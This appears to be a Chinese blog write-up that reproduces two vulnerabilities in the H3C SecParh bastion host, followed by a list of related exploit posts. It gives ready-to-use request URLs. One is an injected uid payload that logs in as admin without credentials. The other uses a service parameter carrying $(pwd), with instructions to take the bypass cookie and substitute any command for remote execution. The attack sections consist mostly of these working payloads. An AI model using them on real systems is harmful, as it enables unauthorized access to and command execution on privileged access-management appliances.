H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
- 1.H3C SecParh堡垒机任意用户登录漏洞
- 1.1.漏洞描述
- 1.2.漏洞影响
- 1.3.漏洞复现
- 1.3.1.登录页面
- 1.3.2.构建URL
- 1.4.总结
- 2.H3C SecParh堡垒机远程命令执行漏洞
- 2.1.漏洞描述
- 2.2.漏洞影响
- 2.3.漏洞复现
- 2.3.1.登录页面
- 2.3.2.构建URL
- 2.4.总结
1.H3C SecParh堡垒机任意用户登录漏洞
1.1.漏洞描述
在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。
1.2.漏洞影响
H3C SecParh堡垒机
1.3.漏洞复现
1.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
1.3.2.构建URL
URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
1.4.总结
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。
2.H3C SecParh堡垒机远程命令执行漏洞
2.1.漏洞描述
H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。
2.2.漏洞影响
H3C SecParh堡垒机
2.3.漏洞复现
2.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
2.3.2.构建URL
URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true
需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
2.4.总结
我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞相关推荐
- 齐治堡垒机任意用户登录漏洞
声明:仅供漏洞检测和学习,勿用于非法测试 漏洞信息 浙江齐治科技股份有限公司是一家主要经营计算机软硬件.网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞, ...
- 浪潮ClusterEngineV4.0 任意用户登录漏洞
文章目录 漏洞名称 漏洞描述 影响版本 fofa 漏洞复现 第一步 登录页面 第二步 成功登录后台 摘抄 漏洞名称 浪潮ClusterEngineV4.0 存在任意用户登录漏洞, 漏洞描述 浪潮Clu ...
- 通达OA任意用户登录复现(最新)
通达OA任意用户登录复现 0x00 漏洞简介 0x01 影响版本 0x02 环境搭建 0x03 漏洞复现 0x04 修复建议 0x00 漏洞简介 通达OA国内常用的办公系统,使用群体,大小公司都可以, ...
- 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
- 某信服终端检测响应平台任意用户登录
深|信服终端检测响应平台(EDR)任意用户登录漏洞 废话不多说,赶紧下线整改吧.. 特殊时期,没事别乱尝试. == 请勿用于攻击破坏 == payload:https://ip:port/ui/log ...
- 通达OA前台任意用户登录漏洞+RCE漏洞复现
声明 本文仅用于技术交流,请勿用于非法用途 由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任. 文章作者拥有对此文章的修改和解释权.如 ...
- 通达OA任意用户登录漏洞复现
目录 通达OA任意用户登录漏洞 漏洞描述 影响范围 漏洞复现 通达OA任意用户登录漏洞
- 【漏洞复现】通达OA v11.7 在线任意用户登录漏洞
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断. 具体fofa语法放在下面: app="TDX ...
- 通达OA任意用户登录复现
1.访问默认管理员后台地址 用户未登录, 弹出如下界面,猜测有通达OA任意用户登录漏洞 2.访问文件https://oaweb.hait.edu.cn//ispirit/login_code.php以 ...
最新文章
- 分享python os.system一点心得
- Java数据类型转换全解
- 添加列属性_css多列属性
- eigen3.3.4安装笔记
- python中字符串函数的用法_python中字符串内置函数的用法介绍(代码)
- 用相同jsp,js文件,同样的接口实现多页面构建
- linux等候脚本,linux – 在bash脚本中继续之前等待通过ssh运行的脚本完成
- 期末考试之排名次java_2020超星尔雅《JavaWeb应用开发》期末测试答案
- 武汉php东和,武汉探东之旅,未完成
- 百度地图Android开发清除上一次驾车导航路线
- 破解网页文字无法复制的方法
- 微信小程序 java音乐播放器系统python php
- 电脑族应该怎么保护眼睛
- Android Object 转 Json
- 太戈编程 1072. 优惠促销 答案及讲解
- 运营必备 - 400 电话
- 风储VSG-基于虚拟同步发电机的风储并网系统MATLAB仿真
- ELSEVIER--关于中国(山东)蜜桃溯源系统
- 动手学深度学习 v2 视频版
- 计算机网络基础 — 运输层常见问题与解答